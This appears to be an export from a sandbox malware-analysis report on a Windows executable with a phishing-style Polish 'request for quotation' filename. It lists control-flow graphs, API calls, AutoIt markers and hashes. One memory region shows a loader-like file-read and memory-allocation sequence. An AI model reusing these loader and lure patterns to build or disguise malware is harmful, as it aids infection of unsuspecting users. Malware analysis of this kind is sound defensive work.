                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                                                                                                                                                      • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                      • API String ID: 2286883814-4206948668
                                                                                                                                                                                                                                                      • Opcode ID: b252b94bb1eccd2d62b9595cdbb8fe767ebda7bb565d3519b11b5a978df4ff56
                                                                                                                                                                                                                                                      • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b252b94bb1eccd2d62b9595cdbb8fe767ebda7bb565d3519b11b5a978df4ff56
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                                                                                      • API String ID: 3888824918-3121273764
                                                                                                                                                                                                                                                      • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                      • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                      • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(00AB0218,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                      • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                      • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                      • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                      • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                      • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                                                                                                                                        • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AB0218,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                      • String ID: #$0$PGH
                                                                                                                                                                                                                                                      • API String ID: 423443420-3673556320
                                                                                                                                                                                                                                                      • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                      • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                        • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                                                                                                                                      • _fseek.LIBCMT ref: 0045267D
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00452689
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00452696
                                                                                                                                                                                                                                                      • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1911931848-0
                                                                                                                                                                                                                                                      • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                      • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1512 40f450-40f45c call 425210 1515 40f460-40f478 1512->1515 1515->1515 1516 40f47a-40f4a8 call 413990 call 410f70 1515->1516 1521 40f4b0-40f4d1 call 4151b0 1516->1521 1524 40f531 1521->1524 1525 40f4d3-40f4da 1521->1525 1526 40f536-40f540 1524->1526 1527 40f4dc-40f4de 1525->1527 1528 40f4fd-40f517 call 41557c 1525->1528 1529 40f4e0-40f4e2 1527->1529 1531 40f51c-40f51f 1528->1531 1532 40f4e6-40f4ed 1529->1532 1531->1521 1533 40f521-40f52c 1532->1533 1534 40f4ef-40f4f2 1532->1534 1535 40f543-40f54e 1533->1535 1536 40f52e-40f52f 1533->1536 1537 42937a-4293a0 call 41557c call 4151b0 1534->1537 1538 40f4f8-40f4fb 1534->1538 1540 40f550-40f553 1535->1540 1541 40f555-40f560 1535->1541 1536->1534 1548 4293a5-4293c3 call 4151d0 1537->1548 1538->1528 1538->1529 1540->1534 1543 429372 1541->1543 1544 40f566-40f571 1541->1544 1543->1537 1546 429361-429367 1544->1546 1547 40f577-40f57a 1544->1547 1546->1532 1549 42936d 1546->1549 1547->1534 1548->1526 1549->1543
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fread_nolock_fseek_strcat
                                                                                                                                                                                                                                                      • String ID: AU3!$EA06
                                                                                                                                                                                                                                                      • API String ID: 3818483258-2658333250
                                                                                                                                                                                                                                                      • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                                                                                                      • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1552 401230-40123b 1553 401241-401272 call 4131f0 call 401be0 1552->1553 1554 4012c5-4012cd 1552->1554 1559 401274-401292 1553->1559 1560 4012ae-4012bf KillTimer SetTimer 1553->1560 1561 42aa61-42aa67 1559->1561 1562 401298-40129c 1559->1562 1560->1554 1565 42aa8b-42aaa7 Shell_NotifyIconW 1561->1565 1566 42aa69-42aa86 Shell_NotifyIconW 1561->1566 1563 4012a2-4012a8 1562->1563 1564 42aaac-42aab3 1562->1564 1563->1560 1567 42aaf8-42ab15 Shell_NotifyIconW 1563->1567 1568 42aad7-42aaf3 Shell_NotifyIconW 1564->1568 1569 42aab5-42aad2 Shell_NotifyIconW 1564->1569 1565->1560 1566->1560 1567->1560 1568->1560 1569->1560
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401257
                                                                                                                                                                                                                                                        • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                        • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                        • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                        • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1792922140-0
                                                                                                                                                                                                                                                      • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                      • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1570 3ee0260-3ee030e call 3eddc50 1573 3ee0315-3ee033b call 3ee1170 CreateFileW 1570->1573 1576 3ee033d 1573->1576 1577 3ee0342-3ee0352 1573->1577 1578 3ee048d-3ee0491 1576->1578 1582 3ee0359-3ee0373 VirtualAlloc 1577->1582 1583 3ee0354 1577->1583 1580 3ee04d3-3ee04d6 1578->1580 1581 3ee0493-3ee0497 1578->1581 1584 3ee04d9-3ee04e0 1580->1584 1585 3ee0499-3ee049c 1581->1585 1586 3ee04a3-3ee04a7 1581->1586 1587 3ee037a-3ee0391 ReadFile 1582->1587 1588 3ee0375 1582->1588 1583->1578 1589 3ee0535-3ee054a 1584->1589 1590 3ee04e2-3ee04ed 1584->1590 1585->1586 1591 3ee04a9-3ee04b3 1586->1591 1592 3ee04b7-3ee04bb 1586->1592 1597 3ee0398-3ee03d8 VirtualAlloc 1587->1597 1598 3ee0393 1587->1598 1588->1578 1593 3ee054c-3ee0557 VirtualFree 1589->1593 1594 3ee055a-3ee0562 1589->1594 1599 3ee04ef 1590->1599 1600 3ee04f1-3ee04fd 1590->1600 1591->1592 1595 3ee04bd-3ee04c7 1592->1595 1596 3ee04cb 1592->1596 1593->1594 1595->1596 1596->1580 1601 3ee03df-3ee03fa call 3ee13c0 1597->1601 1602 3ee03da 1597->1602 1598->1578 1599->1589 1603 3ee04ff-3ee050f 1600->1603 1604 3ee0511-3ee051d 1600->1604 1610 3ee0405-3ee040f 1601->1610 1602->1578 1606 3ee0533 1603->1606 1607 3ee051f-3ee0528 1604->1607 1608 3ee052a-3ee0530 1604->1608 1606->1584 1607->1606 1608->1606 1611 3ee0442-3ee0456 call 3ee11d0 1610->1611 1612 3ee0411-3ee0440 call 3ee13c0 1610->1612 1618 3ee045a-3ee045e 1611->1618 1619 3ee0458 1611->1619 1612->1610 1620 3ee046a-3ee046e 1618->1620 1621 3ee0460-3ee0464 CloseHandle 1618->1621 1619->1578 1622 3ee047e-3ee0487 1620->1622 1623 3ee0470-3ee047b VirtualFree 1620->1623 1621->1620 1622->1573 1622->1578 1623->1622
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EE0331
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EE0557
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 204039940-0
                                                                                                                                                                                                                                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                                                                                                                      • Instruction ID: 870e22fec247e3529c0653321e114dc33576be3df3fe832dd083aa9f77e7877e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FA12875E00208EBDB14CFA5C994BEEB7B5BF48304F249699E111BB280D7B59E81CB64

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1624 414f10-414f2c 1625 414f4f 1624->1625 1626 414f2e-414f31 1624->1626 1627 414f51-414f55 1625->1627 1626->1625 1628 414f33-414f35 1626->1628 1629 414f37-414f46 call 417f23 1628->1629 1630 414f56-414f5b 1628->1630 1638 414f47-414f4c call 417ebb 1629->1638 1631 414f6a-414f6d 1630->1631 1632 414f5d-414f68 1630->1632 1636 414f7a-414f7c 1631->1636 1637 414f6f-414f77 call 4131f0 1631->1637 1632->1631 1635 414f8b-414f9e 1632->1635 1641 414fa0-414fa6 1635->1641 1642 414fa8 1635->1642 1636->1629 1640 414f7e-414f89 1636->1640 1637->1636 1638->1625 1640->1629 1640->1635 1643 414faf-414fb1 1641->1643 1642->1643 1646 4150a1-4150a4 1643->1646 1647 414fb7-414fbe 1643->1647 1646->1627 1649 414fc0-414fc5 1647->1649 1650 415004-415007 1647->1650 1649->1650 1651 414fc7 1649->1651 1652 415071-415072 call 41e6b1 1650->1652 1653 415009-41500d 1650->1653 1654 415102 1651->1654 1655 414fcd-414fd1 1651->1655 1664 415077-41507b 1652->1664 1657 41500f-415018 1653->1657 1658 41502e-415035 1653->1658 1659 415106-41510f 1654->1659 1662 414fd3 1655->1662 1663 414fd5-414fd8 1655->1663 1665 415023-415028 1657->1665 1666 41501a-415021 1657->1666 1660 415037 1658->1660 1661 415039-41503c 1658->1661 1659->1627 1660->1661 1668 415042-41504e call 41453a call 41ed9e 1661->1668 1669 4150d5-4150d9 1661->1669 1662->1663 1670 4150a9-4150af 1663->1670 1671 414fde-414fff call 41ee9b 1663->1671 1664->1659 1672 415081-415085 1664->1672 1667 41502a-41502c 1665->1667 1666->1667 1667->1661 1692 415053-415058 1668->1692 1677 4150eb-4150fd call 417f23 1669->1677 1678 4150db-4150e8 call 4131f0 1669->1678 1673 4150b1-4150bd call 4131f0 1670->1673 1674 4150c0-4150d0 call 417f23 1670->1674 1680 415099-41509b 1671->1680 1672->1669 1679 415087-415096 1672->1679 1673->1674 1674->1638 1677->1638 1678->1677 1679->1680 1680->1646 1680->1647 1693 415114-415118 1692->1693 1694 41505e-415061 1692->1694 1693->1659 1694->1654 1695 415067-41506f 1694->1695 1695->1680
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                                                                                                      • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                      • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1696 401be0-401bf5 1697 401bfb-401c12 call 4013a0 1696->1697 1698 401cde-401ce3 1696->1698 1701 42a9a0-42a9b0 LoadStringW 1697->1701 1702 401c18-401c34 call 4021e0 1697->1702 1704 42a9bb-42a9c8 call 40df50 1701->1704 1707 401c3a-401c3e 1702->1707 1708 42a9cd-42a9ea call 40d3b0 call 437a81 1702->1708 1712 401c53-401cd9 call 4131f0 call 41326a call 411691 Shell_NotifyIconW call 402620 1704->1712 1707->1704 1710 401c44-401c4e call 40d3b0 1707->1710 1708->1712 1720 42a9f0-42aa04 call 40d3b0 call 437a81 1708->1720 1710->1712 1712->1698
                                                                                                                                                                                                                                                      APIs
